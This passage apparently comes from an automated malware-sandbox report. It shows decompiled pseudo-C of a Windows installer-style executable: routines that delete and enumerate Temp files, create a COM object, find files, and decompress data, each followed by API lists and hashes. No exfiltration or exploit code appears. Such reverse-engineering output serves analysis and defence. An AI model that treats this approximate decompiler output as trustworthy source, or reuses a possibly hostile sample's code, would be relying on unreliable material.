                                                                            					__eflags = _t65 & 0x00000002;
                                                                            					if((_t65 & 0x00000002) == 0) {
                                                                            						goto L28;
                                                                            					}
                                                                            					goto L5;
                                                                            				}
                                                                            			}



















                                                                            APIs
                                                                            • DeleteFileW.KERNEL32(?,?,74EDD4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
                                                                            • lstrcatW.KERNEL32 ref: 00405CBA
                                                                            • lstrcatW.KERNEL32 ref: 00405CDD
                                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,74EDD4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
                                                                            • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,74EDD4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
                                                                            • FindClose.KERNEL32(00000000), ref: 00405DA2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                            • String ID: .$.$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                            • API String ID: 2035342205-2602864334
                                                                            • Opcode ID: 159fa2acebf62d68cb64ea74fddd1b0ad159e4272dc91ddb014146492f4e8da9
                                                                            • Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
                                                                            • Opcode Fuzzy Hash: 159fa2acebf62d68cb64ea74fddd1b0ad159e4272dc91ddb014146492f4e8da9
                                                                            • Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 67%
                                                                            			E004021AA(void* __eflags) {
                                                                            				signed int _t52;
                                                                            				void* _t56;
                                                                            				intOrPtr* _t60;
                                                                            				intOrPtr _t61;
                                                                            				intOrPtr* _t62;
                                                                            				intOrPtr* _t64;
                                                                            				intOrPtr* _t66;
                                                                            				intOrPtr* _t68;
                                                                            				intOrPtr* _t70;
                                                                            				intOrPtr* _t72;
                                                                            				intOrPtr* _t74;
                                                                            				intOrPtr* _t76;
                                                                            				intOrPtr* _t78;
                                                                            				intOrPtr* _t80;
                                                                            				void* _t83;
                                                                            				intOrPtr* _t91;
                                                                            				signed int _t101;
                                                                            				signed int _t105;
                                                                            				void* _t107;
                                                                            
                                                                            				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                                                                            				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                                                                            				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                                                                            				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                                                                            				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                                                                            				_t52 =  *(_t107 - 0x20);
                                                                            				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                                                                            				_t101 = _t52 & 0x00008000;
                                                                            				_t105 = _t52 >> 0x0000000c & 0x00000007;
                                                                            				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                                                                            				if(E00405E83( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                                                                            					E00402DA6(0x21);
                                                                            				}
                                                                            				_t56 = _t107 + 8;
                                                                            				__imp__CoCreateInstance(0x4085f0, _t83, 1, 0x4085e0, _t56);
                                                                            				if(_t56 < _t83) {
                                                                            					L14:
                                                                            					 *((intOrPtr*)(_t107 - 4)) = 1;
                                                                            					_push(0xfffffff0);
                                                                            				} else {
                                                                            					_t60 =  *((intOrPtr*)(_t107 + 8));
                                                                            					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x408600, _t107 - 0x38);
                                                                            					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                                                                            					if(_t61 >= _t83) {
                                                                            						_t64 =  *((intOrPtr*)(_t107 + 8));
                                                                            						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                                                                            						if(_t101 == _t83) {
                                                                            							_t80 =  *((intOrPtr*)(_t107 + 8));
                                                                            							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x441000);
                                                                            						}
                                                                            						if(_t105 != _t83) {
                                                                            							_t78 =  *((intOrPtr*)(_t107 + 8));
                                                                            							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                                                                            						}
                                                                            						_t66 =  *((intOrPtr*)(_t107 + 8));
                                                                            						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                                                                            						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                                                                            						if( *_t91 != _t83) {
                                                                            							_t76 =  *((intOrPtr*)(_t107 + 8));
                                                                            							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                                                                            						}
                                                                            						_t68 =  *((intOrPtr*)(_t107 + 8));
                                                                            						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                                                                            						_t70 =  *((intOrPtr*)(_t107 + 8));
                                                                            						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                                                                            						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                                            							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                                                                            							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                                                                            						}
                                                                            						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                                                                            						 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                                            					}
                                                                            					_t62 =  *((intOrPtr*)(_t107 + 8));
                                                                            					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                                                            					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                                            						_push(0xfffffff4);
                                                                            					} else {
                                                                            						goto L14;
                                                                            					}
                                                                            				}
                                                                            				E00401423();
                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t107 - 4));
                                                                            				return 0;
                                                                            			}























                                                                            APIs
                                                                            • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?), ref: 00402229
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CreateInstance
                                                                            • String ID:
                                                                            • API String ID: 542301482-0
                                                                            • Opcode ID: 9a16952c8782792dfdad3a69a6f35c28fddbdbcb44169e511551d3235c99febb
                                                                            • Instruction ID: 5977cb51530078b600b156af0050786de557c4b464dd586e6a5beaa7a0440451
                                                                            • Opcode Fuzzy Hash: 9a16952c8782792dfdad3a69a6f35c28fddbdbcb44169e511551d3235c99febb
                                                                            • Instruction Fuzzy Hash: A7411571A00208EFCF40DFE4C989E9D7BB5BF49348B20456AF905EB2D1DB799981CB94
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 39%
                                                                            			E0040290B(short __ebx, short* __edi) {
                                                                            				void* _t21;
                                                                            
                                                                            				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
                                                                            					E00406484( *((intOrPtr*)(_t21 - 0xc)), _t8);
                                                                            					_push(_t21 - 0x2b0);
                                                                            					_push(__edi);
                                                                            					E0040653D();
                                                                            				} else {
                                                                            					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                                                                            					 *__edi = __ebx;
                                                                            					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                                            				}
                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t21 - 4));
                                                                            				return 0;
                                                                            			}





                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: FileFindFirst
                                                                            • String ID:
                                                                            • API String ID: 1974802433-0
                                                                            • Opcode ID: 6ddf66d317f864cf93ed55985cb47f36fb1104e014878ba6b3b46bd2b1a0b40f
                                                                            • Instruction ID: 3f6fbcf0fd4d311cdd608d5f72697756ed96b8559223cd5d9f1c4d92bc61f1b3
                                                                            • Opcode Fuzzy Hash: 6ddf66d317f864cf93ed55985cb47f36fb1104e014878ba6b3b46bd2b1a0b40f
                                                                            • Instruction Fuzzy Hash: 3CF08271A04105EFD701DBA4ED49AAEB378FF14314F60417BE116F21D0E7B88E159B29
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 79%
                                                                            			E00406D85(signed int __ebx, signed int* __esi) {
                                                                            				signed int _t396;
                                                                            				signed int _t425;
                                                                            				signed int _t442;
                                                                            				signed int _t443;
                                                                            				signed int* _t446;
                                                                            				void* _t448;
                                                                            
                                                                            				L0:
                                                                            				while(1) {
                                                                            					L0:
                                                                            					_t446 = __esi;
                                                                            					_t425 = __ebx;
                                                                            					if( *(_t448 - 0x34) == 0) {
                                                                            						break;
                                                                            					}
                                                                            					L55:
                                                                            					__eax =  *(__ebp - 0x38);
                                                                            					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                            					__ecx = __ebx;
                                                                            					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                            					__ebx = __ebx + 8;
                                                                            					while(1) {
                                                                            						L56:
                                                                            						if(__ebx < 0xe) {
                                                                            							goto L0;
                                                                            						}
                                                                            						L57:
                                                                            						__eax =  *(__ebp - 0x40);
                                                                            						__eax =  *(__ebp - 0x40) & 0x00003fff;
                                                                            						__ecx = __eax;
                                                                            						__esi[1] = __eax;
                                                                            						__ecx = __eax & 0x0000001f;
                                                                            						if(__cl > 0x1d) {
                                                                            							L9:
                                                                            							_t443 = _t442 | 0xffffffff;
                                                                            							 *_t446 = 0x11;
                                                                            							L10:
                                                                            							_t446[0x147] =  *(_t448 - 0x40);
                                                                            							_t446[0x146] = _t425;
                                                                            							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
                                                                            							L11:
                                                                            							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
                                                                            							_t446[0x26ea] =  *(_t448 - 0x30);
                                                                            							E004074F4( *(_t448 + 8));
                                                                            							return _t443;
                                                                            						}
                                                                            						L58:
                                                                            						__eax = __eax & 0x000003e0;
                                                                            						if(__eax > 0x3a0) {
                                                                            							goto L9;
                                                                            						}
                                                                            						L59:
                                                                            						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                                                                            						__ebx = __ebx - 0xe;
                                                                            						_t94 =  &(__esi[2]);
                                                                            						 *_t94 = __esi[2] & 0x00000000;
                                                                            						 *__esi = 0xc;
                                                                            						while(1) {
                                                                            							L60:
                                                                            							__esi[1] = __esi[1] >> 0xa;
                                                                            							__eax = (__esi[1] >> 0xa) + 4;
                                                                            							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                                            								goto L68;
                                                                            							}
                                                                            							L61:
                                                                            							while(1) {
                                                                            								L64:
                                                                            								if(__ebx >= 3) {
                                                                            									break;
                                                                            								}
                                                                            								L62:
                                                                            								if( *(__ebp - 0x34) == 0) {
                                                                            									goto L182;
                                                                            								}
                                                                            								L63:
                                                                            								__eax =  *(__ebp - 0x38);
                                                                            								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                            								__ecx = __ebx;
                                                                            								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                            								__ebx = __ebx + 8;
                                                                            							}
                                                                            							L65:
                                                                            							__ecx = __esi[2];
                                                                            							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                                                                            							__ebx = __ebx - 3;
                                                                            							_t108 = __ecx + 0x4084d4; // 0x121110
                                                                            							__ecx =  *_t108;
                                                                            							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                                                                            							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                                                                            							__ecx = __esi[1];
                                                                            							__esi[2] = __esi[2] + 1;
                                                                            							__eax = __esi[2];
                                                                            							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                                                                            							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                                                                            								goto L64;
                                                                            							}
                                                                            							L66:
                                                                            							while(1) {
                                                                            								L68:
                                                                            								if(__esi[2] >= 0x13) {
                                                                            									break;
                                                                            								}
                                                                            								L67:
                                                                            								_t119 = __esi[2] + 0x4084d4; // 0x4000300
                                                                            								__eax =  *_t119;
                                                                            								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                                                                            								_t126 =  &(__esi[2]);
                                                                            								 *_t126 = __esi[2] + 1;
                                                                            							}
                                                                            							L69:
                                                                            							__ecx = __ebp - 8;
                                                                            							__edi =  &(__esi[0x143]);
                                                                            							 &(__esi[0x148]) =  &(__esi[0x144]);
                                                                            							__eax = 0;
                                                                            							 *(__ebp - 8) = 0;
                                                                            							__eax =  &(__esi[3]);
                                                                            							 *__edi = 7;
                                                                            							__eax = E0040755C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                                                                            							if(__eax != 0) {
                                                                            								L72:
                                                                            								 *__esi = 0x11;
                                                                            								while(1) {
                                                                            									L180:
                                                                            									_t396 =  *_t446;
                                                                            									if(_t396 > 0xf) {
                                                                            										break;
                                                                            									}
                                                                            									L1:
                                                                            									switch( *((intOrPtr*)(_t396 * 4 +  &M004074B4))) {
                                                                            										case 0:
                                                                            											L101:
                                                                            											__eax = __esi[4] & 0x000000ff;
                                                                            											__esi[3] = __esi[4] & 0x000000ff;
                                                                            											__eax = __esi[5];
                                                                            											__esi[2] = __esi[5];
                                                                            											 *__esi = 1;
                                                                            											goto L102;
                                                                            										case 1:
                                                                            											L102:
                                                                            											__eax = __esi[3];
                                                                            											while(1) {
                                                                            												L105:
                                                                            												__eflags = __ebx - __eax;
                                                                            												if(__ebx >= __eax) {
                                                                            													break;
                                                                            												}
                                                                            												L103:
                                                                            												__eflags =  *(__ebp - 0x34);
                                                                            												if( *(__ebp - 0x34) == 0) {
                                                                            													goto L182;
                                                                            												}
                                                                            												L104:
                                                                            												__ecx =  *(__ebp - 0x38);
                                                                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                            												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                            												__ecx = __ebx;
                                                                            												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                            												__ebx = __ebx + 8;
                                                                            												__eflags = __ebx;
                                                                            											}
                                                                            											L106:
                                                                            											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                                                                            											__eax = __eax &  *(__ebp - 0x40);
                                                                            											__ecx = __esi[2];
                                                                            											__eax = __esi[2] + __eax * 4;
                                                                            											__ecx =  *(__eax + 1) & 0x000000ff;
                                                                            											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                            											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                                            											__ecx =  *__eax & 0x000000ff;
                                                                            											__eflags = __ecx;
                                                                            											if(__ecx != 0) {
                                                                            												L108:
                                                                            												__eflags = __cl & 0x00000010;
                                                                            												if((__cl & 0x00000010) == 0) {
                                                                            													L110:
                                                                            													__eflags = __cl & 0x00000040;
                                                                            													if((__cl & 0x00000040) == 0) {
                                                                            														goto L125;
                                                                            													}
                                                                            													L111:
                                                                            													__eflags = __cl & 0x00000020;
                                                                            													if((__cl & 0x00000020) == 0) {
                                                                            														goto L9;
                                                                            													}
                                                                            													L112:
                                                                            													 *__esi = 7;
                                                                            													goto L180;
                                                                            												}
                                                                            												L109:
                                                                            												__esi[2] = __ecx;
                                                                            												__esi[1] = __eax;
                                                                            												 *__esi = 2;
                                                                            												goto L180;
                                                                            											}
                                                                            											L107:
                                                                            											__esi[2] = __eax;
                                                                            											 *__esi = 6;
                                                                            											goto L180;
                                                                            										case 2:
                                                                            											L113:
                                                                            											__eax = __esi[2];
                                                                            											while(1) {
                                                                            												L116:
                                                                            												__eflags = __ebx - __eax;
                                                                            												if(__ebx >= __eax) {
                                                                            													break;
                                                                            												}
                                                                            												L114:
                                                                            												__eflags =  *(__ebp - 0x34);
                                                                            												if( *(__ebp - 0x34) == 0) {
                                                                            													goto L182;
                                                                            												}
                                                                            												L115:
                                                                            												__ecx =  *(__ebp - 0x38);
                                                                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                            												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                            												__ecx = __ebx;
                                                                            												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                            												__ebx = __ebx + 8;
                                                                            												__eflags = __ebx;
                                                                            											}
                                                                            											L117:
                                                                            											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                            											__esi[1] = __esi[1] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                            											__ecx = __eax;
                                                                            											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                            											__ebx = __ebx - __eax;
                                                                            											__eflags = __ebx;
                                                                            											__eax = __esi[4] & 0x000000ff;
                                                                            											__esi[3] = __esi[4] & 0x000000ff;
                                                                            											__eax = __esi[6];
                                                                            											__esi[2] = __esi[6];
                                                                            											 *__esi = 3;
                                                                            											goto L118;
                                                                            										case 3:
                                                                            											L118:
                                                                            											__eax = __esi[3];
                                                                            											while(1) {
                                                                            												L121:
                                                                            												__eflags = __ebx - __eax;
                                                                            												if(__ebx >= __eax) {
                                                                            													break;
                                                                            												}
                                                                            												L119:
                                                                            												__eflags =  *(__ebp - 0x34);
                                                                            												if( *(__ebp - 0x34) == 0) {
                                                                            													goto L182;
                                                                            												}
                                                                            												L120:
                                                                            												__ecx =  *(__ebp - 0x38);
                                                                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                            												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                            												__ecx = __ebx;
                                                                            												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                            												__ebx = __ebx + 8;
                                                                            												__eflags = __ebx;
                                                                            											}
                                                                            											L122:
                                                                            											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                                                                            											__eax = __eax &  *(__ebp - 0x40);
                                                                            											__ecx = __esi[2];
                                                                            											__eax = __esi[2] + __eax * 4;
                                                                            											__ecx =  *(__eax + 1) & 0x000000ff;
                                                                            											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                            											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                                            											__ecx =  *__eax & 0x000000ff;
                                                                            											__eflags = __cl & 0x00000010;
                                                                            											if((__cl & 0x00000010) == 0) {
                                                                            												L124:
                                                                            												__eflags = __cl & 0x00000040;
                                                                            												if((__cl & 0x00000040) != 0) {
                                                                            													goto L9;
                                                                            												}
                                                                            												L125:
                                                                            												__esi[3] = __ecx;
                                                                            												__ecx =  *(__eax + 2) & 0x0000ffff;
                                                                            												__esi[2] = __eax;
                                                                            												goto L180;
                                                                            											}
                                                                            											L123:
                                                                            											__esi[2] = __ecx;
                                                                            											__esi[3] = __eax;
                                                                            											 *__esi = 4;
                                                                            											goto L180;
                                                                            										case 4:
                                                                            											L126:
                                                                            											__eax = __esi[2];
                                                                            											while(1) {
                                                                            												L129:
                                                                            												__eflags = __ebx - __eax;
                                                                            												if(__ebx >= __eax) {
                                                                            													break;
                                                                            												}
                                                                            												L127:
                                                                            												__eflags =  *(__ebp - 0x34);
                                                                            												if( *(__ebp - 0x34) == 0) {
                                                                            													goto L182;
                                                                            												}
                                                                            												L128:
                                                                            												__ecx =  *(__ebp - 0x38);
                                                                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                            												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                            												__ecx = __ebx;
                                                                            												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                            												__ebx = __ebx + 8;
                                                                            												__eflags = __ebx;
                                                                            											}
                                                                            											L130:
                                                                            											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                            											__esi[3] = __esi[3] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                            											__ecx = __eax;
                                                                            											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                            											__ebx = __ebx - __eax;
                                                                            											__eflags = __ebx;
                                                                            											 *__esi = 5;
                                                                            											goto L131;
                                                                            										case 5:
                                                                            											L131:
                                                                            											__eax =  *(__ebp - 0x30);
                                                                            											__edx = __esi[3];
                                                                            											__eax = __eax - __esi;
                                                                            											__ecx = __eax - __esi - 0x1ba0;
                                                                            											__eflags = __eax - __esi - 0x1ba0 - __edx;
                                                                            											if(__eax - __esi - 0x1ba0 >= __edx) {
                                                                            												__ecx = __eax;
                                                                            												__ecx = __eax - __edx;
                                                                            												__eflags = __ecx;
                                                                            											} else {
                                                                            												__esi[0x26e8] = __esi[0x26e8] - __edx;
                                                                            												__ecx = __esi[0x26e8] - __edx - __esi;
                                                                            												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
                                                                            											}
                                                                            											__eflags = __esi[1];
                                                                            											 *(__ebp - 0x20) = __ecx;
                                                                            											if(__esi[1] != 0) {
                                                                            												L135:
                                                                            												__edi =  *(__ebp - 0x2c);
                                                                            												do {
                                                                            													L136:
                                                                            													__eflags = __edi;
                                                                            													if(__edi != 0) {
                                                                            														goto L152;
                                                                            													}
                                                                            													L137:
                                                                            													__edi = __esi[0x26e8];
                                                                            													__eflags = __eax - __edi;
                                                                            													if(__eax != __edi) {
                                                                            														L143:
                                                                            														__esi[0x26ea] = __eax;
                                                                            														__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                                                            														__eax = __esi[0x26ea];
                                                                            														__ecx = __esi[0x26e9];
                                                                            														__eflags = __eax - __ecx;
                                                                            														 *(__ebp - 0x30) = __eax;
                                                                            														if(__eax >= __ecx) {
                                                                            															__edi = __esi[0x26e8];
                                                                            															__edi = __esi[0x26e8] - __eax;
                                                                            															__eflags = __edi;
                                                                            														} else {
                                                                            															__ecx = __ecx - __eax;
                                                                            															__edi = __ecx - __eax - 1;
                                                                            														}
                                                                            														__edx = __esi[0x26e8];
                                                                            														__eflags = __eax - __edx;
                                                                            														 *(__ebp - 8) = __edx;
                                                                            														if(__eax == __edx) {
                                                                            															__edx =  &(__esi[0x6e8]);
                                                                            															__eflags = __ecx - __edx;
                                                                            															if(__ecx != __edx) {
                                                                            																__eax = __edx;
                                                                            																__eflags = __eax - __ecx;
                                                                            																 *(__ebp - 0x30) = __eax;
                                                                            																if(__eax >= __ecx) {
                                                                            																	__edi =  *(__ebp - 8);
                                                                            																	__edi =  *(__ebp - 8) - __eax;
                                                                            																	__eflags = __edi;
                                                                            																} else {
                                                                            																	__ecx = __ecx - __eax;
                                                                            																	__edi = __ecx;
                                                                            																}
                                                                            															}
                                                                            														}
                                                                            														__eflags = __edi;
                                                                            														if(__edi == 0) {
                                                                            															goto L183;
                                                                            														} else {
                                                                            															goto L152;
                                                                            														}
                                                                            													}
                                                                            													L138:
                                                                            													__ecx = __esi[0x26e9];
                                                                            													__edx =  &(__esi[0x6e8]);
                                                                            													__eflags = __ecx - __edx;
                                                                            													if(__ecx == __edx) {
                                                                            														goto L143;
                                                                            													}
                                                                            													L139:
                                                                            													__eax = __edx;
                                                                            													__eflags = __eax - __ecx;
                                                                            													if(__eax >= __ecx) {
                                                                            														__edi = __edi - __eax;
                                                                            														__eflags = __edi;
                                                                            													} else {
                                                                            														__ecx = __ecx - __eax;
                                                                            														__edi = __ecx;
                                                                            													}
                                                                            													__eflags = __edi;
                                                                            													if(__edi == 0) {
                                                                            														goto L143;
                                                                            													}
                                                                            													L152:
                                                                            													__ecx =  *(__ebp - 0x20);
                                                                            													 *__eax =  *__ecx;
                                                                            													__eax = __eax + 1;
                                                                            													__ecx = __ecx + 1;
                                                                            													__edi = __edi - 1;
                                                                            													__eflags = __ecx - __esi[0x26e8];
                                                                            													 *(__ebp - 0x30) = __eax;
                                                                            													 *(__ebp - 0x20) = __ecx;
                                                                            													 *(__ebp - 0x2c) = __edi;
                                                                            													if(__ecx == __esi[0x26e8]) {
                                                                            														__ecx =  &(__esi[0x6e8]);
                                                                            														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
                                                                            													}
                                                                            													_t357 =  &(__esi[1]);
                                                                            													 *_t357 = __esi[1] - 1;
                                                                            													__eflags =  *_t357;
                                                                            												} while ( *_t357 != 0);
                                                                            											}
                                                                            											goto L23;
                                                                            										case 6:
                                                                            											L156:
                                                                            											__eax =  *(__ebp - 0x2c);
                                                                            											__edi =  *(__ebp - 0x30);
                                                                            											__eflags = __eax;
                                                                            											if(__eax != 0) {
                                                                            												L172:
                                                                            												__cl = __esi[2];
                                                                            												 *__edi = __cl;
                                                                            												__edi = __edi + 1;
                                                                            												__eax = __eax - 1;
